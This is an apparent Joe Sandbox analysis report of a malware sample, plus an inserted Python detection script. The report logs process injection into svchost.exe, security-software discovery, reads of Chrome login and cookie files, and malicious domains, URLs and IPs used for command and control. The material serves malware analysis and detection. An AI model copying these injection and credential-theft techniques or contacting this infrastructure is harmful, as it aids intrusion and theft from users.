        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 24E71DB0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1F1ED140000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1E554130000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1AF62F80000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 23E48FA0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DD8F7B0000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 2828E500000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 151ABB60000Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 12DBC450000Jump to behavior
        Source: C:\Windows\System32\svchost.exeThread register set: target process: 5440Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04649000 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,5_2_04649000
        Source: C:\Windows\System32\svchost.exeCode function: 7_2_0000022BAF54BBD0 LoadLibraryA,GetProcAddress,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,7_2_0000022BAF54BBD0
        Source: C:\Windows\System32\svchost.exeThread register set: 5440 4D000Jump to behavior
        Source: C:\Windows\System32\svchost.exeCode function: GetVersionExW,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,FindCloseChangeNotification,Sleep,Sleep,Sleep,Sleep,OpenThread,WaitForSingleObject,GetExitCodeThread,SetConsoleCtrlHandler,CloseHandle,CloseHandle,WaitForSingleObject,Sleep,WaitForSingleObject,CloseHandle,SetConsoleCtrlHandler,OpenThread,WaitForSingleObject,SetConsoleCtrlHandler, %ssvchost.exe -k WspService7_2_0000022BAF54C670
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04642090 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,5_2_04642090
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" -hJump to behavior
        Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k WspServiceJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04642090 mouse_event,MapVirtualKeyW,mouse_event,SetCursorPos,mouse_event,WindowFromPoint,SetCapture,mouse_event,MapVirtualKeyW,keybd_event,mouse_event,mouse_event,mouse_event,MapVirtualKeyW,5_2_04642090
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463AE60 Sleep,CloseHandle,InitializeSecurityDescriptor,AllocateAndInitializeSid,UnmapViewOfFile,GetLengthSid,GetProcessHeap,RtlAllocateHeap,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,FreeSid,GetProcessHeap,HeapFree,5_2_0463AE60
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463AE60 Sleep,CloseHandle,InitializeSecurityDescriptor,AllocateAndInitializeSid,UnmapViewOfFile,GetLengthSid,GetProcessHeap,RtlAllocateHeap,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,FreeSid,GetProcessHeap,HeapFree,5_2_0463AE60
        Source: svchost.exe, 00000009.00000002.788123710.00000067B64FE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004071DC
        Source: C:\Users\user\Desktop\file.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_0040798E
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004065CF cpuid 0_2_004065CF
        Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00404529 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00404529
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040185D GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,___crtGetCommandLineW,___crtGetEnvironmentStringsW,__wsetargv,__amsg_exit,__wsetenvp,__amsg_exit,__cinit,__amsg_exit,0_2_0040185D
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
        Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
        Source: svchost.exe, 00000023.00000000.402374012.000002828E323000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

        Stealing of Sensitive Information

Source: C:\Windows\System32\svchost.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.db
Source: C:\Windows\System32\svchost.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies.db
Source: C:\Windows\System32\svchost.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\svchost.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 5_2_04653DA0 WSAGetLastError,socket,WSAGetLastError,WSAIoctl,WSAGetLastError,htons,bind,WSAGetLastError,5_2_04653DA0
Source: C:\Windows\SysWOW64\rundll32.exe  Code function: 5_2_0464DB70 htons,bind,bind,InterlockedIncrement,InterlockedIncrement,InterlockedIncrement,5_2_0464DB70
Source: C:\Windows\System32\svchost.exe  Code function: 7_2_0000022BAF5564C0 socket,bind,WSAGetLastError,SetLastError,closesocket,WSAGetLastError,SetLastError,7_2_0000022BAF5564C0
Source: C:\Windows\System32\svchost.exe  Code function: 7_2_0000022BAF558260 WSAGetLastError,socket,htons,bind,WSAGetLastError,7_2_0000022BAF558260
Source: C:\Windows\System32\svchost.exe  Code function: 7_2_0000022BAF550DF0 htons,bind,7_2_0000022BAF550DF0
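The injection listing above (rundll32.exe allocates an execute/read/write region in svchost.exe, writes it, then starts a thread in it), the ROOT\SecurityCenter2 enumeration and the Chrome Login Data / Cookies reads by svchost.exe are the raw events a detection would correlate. The Python script below is an added example, not part of the Joe Sandbox report: it parses lines in the shape listed on this page, ties each "Thread created" EIP to an allocation by the low 32 bits of the region base (the report prints the base as a 64-bit address but the EIP as 32 bits, e.g. base 22BAF470000 and EIP AF470000), and emits findings. The sample lines are constructed from addresses on this page; the rule names, severities and the list of browser binaries are assumptions of the example.

```python
import re
from collections import defaultdict

# Constructed sample input: behaviour lines in the shape this report lists
# them (source process, event, target process, address). Addresses are taken
# from the listing above; the lines themselves are not a sandbox export.
SAMPLE_EVENTS = r"""
Source: C:\Windows\SysWOW64\rundll32.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 22BAF470000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe  Memory written: C:\Windows\System32\svchost.exe base: 22BAF470000
Source: C:\Windows\SysWOW64\rundll32.exe  Thread created: C:\Windows\System32\svchost.exe EIP: AF470000
Source: C:\Windows\SysWOW64\rundll32.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 1DD8F7B0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe  Memory written: C:\Windows\System32\svchost.exe base: 1DD8F7B0000
Source: C:\Windows\System32\svchost.exe  Memory allocated: C:\Windows\System32\svchost.exe base: 151ABB60000 protect: page read and write
Source: C:\Windows\System32\svchost.exe  WMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Google\Chrome\Application\chrome.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
"""

EVENT_RE = {
    "alloc": re.compile(r"^Source: (?P<src>.+?\.exe)\s+Memory allocated: (?P<dst>.+?\.exe)\s+base: (?P<base>[0-9A-Fa-f]+)\s+protect: (?P<prot>.+)$"),
    "write": re.compile(r"^Source: (?P<src>.+?\.exe)\s+Memory written: (?P<dst>.+?\.exe)\s+base: (?P<base>[0-9A-Fa-f]+)$"),
    "thread": re.compile(r"^Source: (?P<src>.+?\.exe)\s+Thread created: (?P<dst>.+?\.exe)\s+EIP: (?P<eip>[0-9A-Fa-f]+)$"),
    "wmi": re.compile(r"^Source: (?P<src>.+?\.exe)\s+WMI Queries: .*ROOT\\(?P<ns>SecurityCenter2?) : (?P<cls>\w+)$"),
    "file": re.compile(r"^Source: (?P<src>.+?\.exe)\s+File opened: (?P<path>.+)$"),
}

SECURITY_CENTER_CLASSES = {"AntiVirusProduct", "FirewallProduct", "AntiSpywareProduct"}
# Chrome stores named in the report; the browser list is an assumption of this example.
CREDENTIAL_STORES = {"Login Data", "Login Data.db", "Cookies", "Cookies.db"}
BROWSER_BINARIES = {"chrome.exe", "msedge.exe", "firefox.exe"}


def parse_events(text):
    """Turn behaviour lines into (kind, fields) tuples; unknown lines are skipped."""
    events = []
    for line in text.strip().splitlines():
        for kind, rx in EVENT_RE.items():
            m = rx.match(line.strip())
            if m:
                events.append((kind, m.groupdict()))
                break
    return events


def injection_chains(events):
    """Correlate allocate -> write -> thread per (source, target) pair.

    The report prints the allocation base as a 64-bit address but the new
    thread's EIP as 32 bits, so a thread is tied to a region by the low
    32 bits of the region's base.
    """
    regions = defaultdict(dict)          # (src, dst) -> base -> set of stages
    for kind, ev in events:
        if kind not in ("alloc", "write", "thread") or ev["src"] == ev["dst"]:
            continue                     # only cross-process activity counts
        stages = regions[(ev["src"], ev["dst"])]
        if kind == "alloc":
            stage = "rwx" if "execute" in ev["prot"] else "rw"
            stages.setdefault(int(ev["base"], 16), set()).add(stage)
        elif kind == "write":
            stages.setdefault(int(ev["base"], 16), set()).add("written")
        else:
            eip = int(ev["eip"], 16)
            for base, seen in stages.items():
                if base & 0xFFFFFFFF == eip:
                    seen.add("thread")
    findings = []
    for (src, dst), bases in regions.items():
        for base, seen in sorted(bases.items()):
            if "rwx" in seen and "written" in seen:
                complete = "thread" in seen
                findings.append({
                    "rule": "remote thread in RWX region" if complete
                            else "RWX region written, no thread seen",
                    "severity": "high" if complete else "medium",
                    "source": src, "target": dst, "base": f"{base:X}",
                })
    return findings


def discovery_and_theft(events):
    """Flag SecurityCenter2 enumeration and credential-store reads by non-browsers."""
    findings = []
    for kind, ev in events:
        if kind == "wmi" and ev["cls"] in SECURITY_CENTER_CLASSES:
            findings.append({"rule": "security software discovery via WMI",
                             "severity": "medium", "source": ev["src"],
                             "detail": f"ROOT\\{ev['ns']} {ev['cls']}"})
        elif kind == "file":
            store = ev["path"].rsplit("\\", 1)[-1]
            reader = ev["src"].rsplit("\\", 1)[-1].lower()
            if store in CREDENTIAL_STORES and reader not in BROWSER_BINARIES:
                findings.append({"rule": "browser credential store read by non-browser process",
                                 "severity": "high", "source": ev["src"],
                                 "detail": ev["path"]})
    return findings


def analyze(text):
    events = parse_events(text)
    return injection_chains(events) + discovery_and_theft(events)


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

On the constructed input the script reports one complete chain (22BAF470000, high), one region that was allocated RWX and written but never had a thread started in it (1DD8F7B0000, medium), the AntiVirusProduct enumeration, and the Login Data read by svchost.exe; the Cookies read by chrome.exe is ignored because a browser reading its own store is expected. Allocations inside the source's own process are skipped so that unpacking stubs are not counted as injection.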
MITRE ATT&CK Matrix: techniques with signature hits, grouped by tactic. The numbers are the matrix's signature-count badges, reproduced as extracted (adjacent badges ran together); matrix cells without a badge are omitted.

Initial Access: Valid Accounts (1)
Execution: Windows Management Instrumentation (111); Native API (2); Service Execution (12)
Persistence: Create Account (1); Valid Accounts (1); Windows Service (11); Bootkit (1)
Privilege Escalation: Valid Accounts (1); Access Token Manipulation (11); Windows Service (11); Process Injection (822)
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Install Root Certificate (1); Software Packing (1); File Deletion (1); Masquerading (11); Valid Accounts (1); Modify Registry (1); Virtualization/Sandbox Evasion (12); Access Token Manipulation (11); Process Injection (822); Bootkit (1); Rundll32 (1); Indicator Removal on Host (1)
Credential Access: OS Credential Dumping (1); Network Sniffing (1); Input Capture (11)
Discovery: System Time Discovery (1); System Service Discovery (1); File and Directory Discovery (3); Network Sniffing (1); System Information Discovery (37); Security Software Discovery (481); Virtualization/Sandbox Evasion (12); Process Discovery (3); Application Window Discovery (1); Remote System Discovery (1)
Lateral Movement: no signature hits
Collection: Archive Collected Data (1); Man in the Browser (1); Data from Local System (1); Input Capture (11); Clipboard Data (2)
Exfiltration: no signature hits
Command and Control: Ingress Tool Transfer (2); Encrypted Channel (11); Non-Application Layer Protocol (3); Application Layer Protocol (14)
Network Effects, Remote Service Effects, Impact: no signature hits
Behavior Graph (text rendering; Behavior Graph ID: 700949, Sample: file.exe, Startdate: 11/09/2022, Architecture: WINDOWS, Score: 100)

Start
  Signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 2 other signatures
  +- rundll32.exe (started)
  |  +- rundll32.exe (started)
  |     Signatures: Contains functionality to infect the boot sector; Contains functionality to inject threads in other processes; Contains functionality to inject code into remote processes; 5 other signatures
  |     +- svchost.exe (injected)
  |     |  Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to inject threads in other processes; Sets debug register (to hijack the execution of another thread); 4 other signatures
  |     |  +- svchost.exe (started)
  |     |     Network: g.agametog.com 34.142.181.181 ATGS-MMD-ASUS United States; 208.95.112.1 TUT-ASUS United States; 104.21.34.132 CLOUDFLARENETUS United States
  |     |     Dropped: C:\Users\user\AppData\Local\...\Cookies.db (SQLite); C:\Users\user\AppData\Local\...\Login Data.db (SQLite)
  |     |     Signatures: Query firmware table information (likely to detect VMs); Installs new ROOT certificates; Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically); Tries to harvest and steal browser information (history, passwords, etc)
  |     +- svchost.exe (injected)
  |     |  +- WMIADAP.exe (started)
  |     +- svchost.exe (injected)
  |     |  Network: 8.238.85.254 LEVEL3US United States
  |     +- 16 other processes
  |        Network: 20.199.120.151 MICROSOFT-CORP-MSN-AS-BLOCKUS United States; 20.199.120.182 MICROSOFT-CORP-MSN-AS-BLOCKUS United States
  +- file.exe (started)
     Signatures: Creates processes via WMI
     +- file.exe (started)
     |  Network: 104.21.40.196, 443, 49725 CLOUDFLARENETUS United States; v.xyzgamev.com 172.67.188.70, 443, 49724 CLOUDFLARENETUS United States
     |  Dropped: C:\Users\user\AppData\Local\Temp\db.dll (PE32)
     |  +- conhost.exe (started)
     +- conhost.exe (started)

Antivirus detection for the sample:
Source | Detection | Scanner | Label
file.exe | 10% | ReversingLabs | -
Dropped files: No Antivirus matches
Antivirus detection for unpacked PE files:
Source | Detection | Scanner | Label
19.2.svchost.exe.1b6d6000000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
27.2.svchost.exe.236f3940000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
30.2.svchost.exe.1e554740000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
9.2.svchost.exe.244fc400000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
11.0.svchost.exe.2d6cb270000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
34.0.svchost.exe.1dd8fdb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
18.2.svchost.exe.1f97f120000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
22.2.svchost.exe.25139800000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
25.2.svchost.exe.195990b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
23.2.svchost.exe.226f8d40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
20.0.svchost.exe.2468b5b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
25.0.svchost.exe.195990b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
7.2.svchost.exe.22baf530000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
18.0.svchost.exe.1f97f120000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
11.2.svchost.exe.2d6cb270000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
17.2.svchost.exe.1dbfc920000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
7.0.svchost.exe.22baf530000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
33.2.svchost.exe.23e495b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
23.0.svchost.exe.226f8d40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
37.2.svchost.exe.12dbc510000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
19.0.svchost.exe.1b6d6000000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
29.2.svchost.exe.1f1ed200000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
28.0.svchost.exe.24e72070000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
35.2.svchost.exe.28291080000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
36.2.svchost.exe.151abe70000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
29.0.svchost.exe.1f1ed200000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
37.0.svchost.exe.12dbc510000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
30.0.svchost.exe.1e554740000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
34.2.svchost.exe.1dd8fdb0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
35.0.svchost.exe.28291080000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
22.0.svchost.exe.25139800000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
33.0.svchost.exe.23e495b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
9.2.svchost.exe.244fe400000.4.unpack | 100% | Avira | HEUR/AGEN.1239265
5.2.rundll32.exe.4630000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
17.0.svchost.exe.1dbfc920000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
32.2.svchost.exe.1af63d40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
28.2.svchost.exe.24e72070000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
27.0.svchost.exe.236f3940000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
36.0.svchost.exe.151abe70000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
20.2.svchost.exe.2468b5b0000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
32.0.svchost.exe.1af63d40000.0.unpack | 100% | Avira | TR/ATRAPS.Gen2
Antivirus detection for domains:
Source | Detection | Scanner | Label
v.xyzgamev.com | 12% | Virustotal | -
Antivirus detection for URLs (strings are reported as found in memory, trailing junk included):
Source | Detection | Scanner | Label
https:///xboxlive.com | 0% | Avira URL Cloud | safe
https://v.xyzgamev.com/911.html | 16% | Virustotal | -
http://35.236.159.79/win.pacAutoConfigURLSOFTWARE | 12% | Virustotal | -
https:///live.com | 0% | Avira URL Cloud | safe
https://v.xyzgamev.com/911.html | 100% | Avira URL Cloud | malware
https://p-api.com/json/?fields=8198 | 0% | Avira URL Cloud | safe
https://login.windows.net12DF7 | 0% | Avira URL Cloud | safe
https://pp.abcgameabc.com/ | 0% | Avira URL Cloud | safe
https://v.xyzgamev.com/logo.png | 100% | Avira URL Cloud | malware
http://35.236.159.79/win.pacAutoConfigURLSOFTWARE | 100% | Avira URL Cloud | malware
https://pp.abcgameabc.com/api4.php | 0% | Avira URL Cloud | safe
https://pp.abcgameabc.com/api4.phpCH | 0% | Avira URL Cloud | safe
https:///windows.net | 0% | Avira URL Cloud | safe
https://login.windows.netory | 0% | Avira URL Cloud | safe
http://35.236.159.79/win.pac | 100% | Avira URL Cloud | malware
https://pp.abcgameabc.com/api4.phpy | 0% | Avira URL Cloud | safe
https://pp.abcgameabc.com/api4.phpSTEM | 0% | Avira URL Cloud | safe
https://xsts.auth.xboxlive.com2 | 0% | Avira URL Cloud | safe
https://login.windows.net1002 | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
v.xyzgamev.com | 172.67.188.70 | true | false | - | unknown
g.agametog.com | 34.142.181.181 | true | true | - | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
https://v.xyzgamev.com/911.html | true | 16% Virustotal; Avira URL Cloud: malware | unknown
https://v.xyzgamev.com/logo.png | true | Avira URL Cloud: malware | unknown
https://pp.abcgameabc.com/api4.php | false | Avira URL Cloud: safe | unknown
URLs from memory and binary strings:
Name | Source | Malicious | Antivirus Detection | Reputation
https://login.windows.net | svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://35.236.159.79/win.pacAutoConfigURLSOFTWARE | svchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmp | false | 12% Virustotal; Avira URL Cloud: malware | unknown
https:///xboxlive.com | svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://www.google.com/P | svchost.exe, 00000013.00000000.318145699.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000013.00000002.790922595.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000013.00000000.322130353.000001B6D541F000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://xsts.auth.xboxlive.com | svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://ip-api.com/json/?fields=8198countryCoderegionquerymachineidipverchannelid9.9mverp=https://pp. | svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp; svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://pp.abcgameabc.com/ | svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.windows.net12DF7 | svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://p-api.com/json/?fields=8198 | svchost.exe, 00000009.00000002.795608571.00000244FC25B000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https:///live.com | svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
https://login.windows.net/ | svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://pp.abcgameabc.com/api4.phpCH | svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://login.windows.netory | svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.392552324.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ip-api.com/json/?fields=8198 | svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp; svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https:///windows.net | svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://35.236.159.79/win.pac | svchost.exe, 00000009.00000003.430405515.00000244FC2A3000.00000004.00000020.00020000.00000000.sdmp; svchost.exe, 00000009.00000002.806322399.00000244FDFA0000.00000040.00001000.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://pp.abcgameabc.com/api4.phpy | svchost.exe, 00000009.00000002.796378573.00000244FC274000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://pp.abcgameabc.com/api4.phpSTEM | svchost.exe, 00000009.00000002.800128665.00000244FC2E3000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.instagram.com/accounts/edit/ | svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp; svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://login.windows.net/2DF7 | svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | - | high
https://login.windows.net1002 | svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://xsts.auth.xboxlive.com2 | svchost.exe, 00000021.00000000.392493855.0000023E48858000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000002.791673534.0000023E48876000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000000.389404564.0000023E48858000.00000004.00000001.00020000.00000000.sdmp; svchost.exe, 00000021.00000002.790934591.0000023E48858000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://xsts.auth.xboxlive.com/ | svchost.exe, 00000021.00000000.389500107.0000023E48876000.00000004.00000001.00020000.00000000.sdmp | false | - | high
Contacted IPs:
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.34.132 | unknown | United States | 13335 | CLOUDFLARENETUS | false
20.199.120.182 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
208.95.112.1 | unknown | United States | 53334 | TUT-ASUS | false
8.238.85.254 | unknown | United States | 3356 | LEVEL3US | false
172.67.188.70 | v.xyzgamev.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.40.196 | unknown | United States | 13335 | CLOUDFLARENETUS | false
34.142.181.181 | g.agametog.com | United States | 2686 | ATGS-MMD-ASUS | true
20.199.120.151 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:700949
                            Start date and time:2022-09-11 10:15:18 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 14m 8s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:file.exe
                            Cookbook file name:default.jbs
